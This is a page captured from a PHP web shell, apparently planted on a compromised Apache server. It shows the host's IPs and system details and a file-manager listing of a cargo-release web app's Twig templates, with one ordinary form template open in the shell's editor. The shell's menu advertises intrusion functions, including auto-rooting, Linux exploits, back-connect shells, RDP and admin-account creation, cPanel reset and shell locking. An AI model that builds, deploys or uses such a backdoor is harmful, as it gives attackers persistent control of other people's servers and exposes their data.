Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.143.228.88
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz2 /
templates /
release /
[ HOME SHELL ]
Name
Size
Permission
Action
cargo.html.twig
1.66
KB
-rw-rw-r--
edit.html.twig
4.67
KB
-rw-rw-r--
filtered.html.twig
1.14
KB
-rw-rw-r--
generate.html.twig
4.26
KB
-rw-rw-r--
list.html.twig
1.2
KB
-rw-rw-r--
search.html.twig
0
B
-rw-rw-r--
today.html.twig
1.14
KB
-rw-rw-r--
unsigned.html.twig
1.6
KB
-rw-rw-r--
view.html.twig
8.67
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit.html.twig
{% extends 'base1.html.twig' %} {% block stylesheet %} <link href="https://cdn.jsdelivr.net/npm/select2@4.1.0-beta.1/dist/css/select2.min.css" rel="stylesheet" /> <style> .form-control.select2 { height: 40px; } .select2-container .select2-selection--single { height: inherit; } </style> {% endblock %} {% block content %} <div class="content"> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="header"> <h4 class="title">Edit Release Order</h4> </div> <div class="content"> <form action="{{ path('editRelease', {'id': release.id}) }}" method="post" onsubmit="return checkForm(this);" name="releaseForm"> <div class="forms"> <div class="form-group"> <label for="customer"><h4>Cargo:</h4></label> <select class="form-control select2" name="cargo" required> <option value="">Select Cargo</option> {% for item in cargo %} <option {{ release.cargo.id == item.id ? 'selected' : ''}} value="{{ item.id }}">{{ item.cargoname }}</option> {% endfor %} </select> </div> <div class="form-group"> <label for="customer"><h4>Customer:</h4></label> <input class="form-control" type="text" id="customer" name="customer" value="{{ release.customer }}" /> </div> <div class="form-group"> <label for="quantity"><h4>Quantity:</h4></label> <input class="form-control" type="text" id="quantity" name="quantity" value="{{ release.quantity }}" /> </div> <div class="form-group"> <label for="date"><h4>Date:</h4></label> <input class="form-control" type="text" id="date" name="date" value="{{ release.date }}" /> </div> {# <div class="form-group"> <label for="depot"><h4>Depot:</h4></label> <input class="form-control" type="text" id="depot" name="depot" value="{{ release.depot }}" /> </div> #} <div class="form-group"> <label for="depot"> <h4>Depot</h4> </label> <select name="depot" id="depot" class="form-control select2"> <option value="">Select Depot</option> {% for item in depots %} <option {{ release.depot ? release.depot.id == item.id ? 'selected' : '' : ''}} value="{{ item.id }}">{{ item.name }}</option> {% endfor %} </select> </div> <div class="form-group"> <label for="bank"><h4>Bank:</h4></label> <input class="form-control" type="text" id="bank" name="bank" value="{{ release.bank }}" /> </div> <button type="submit" name="submit" class="btn btn-default">Save</button> </div> </form> </div> </div> </div> </div> </div> </div> {% endblock %} {% block javascript %} {{ parent() }} <script src="https://cdn.jsdelivr.net/npm/select2@4.1.0-beta.1/dist/js/select2.min.js"></script> <script> $('.select2').select2(); </script> {% endblock %}
Close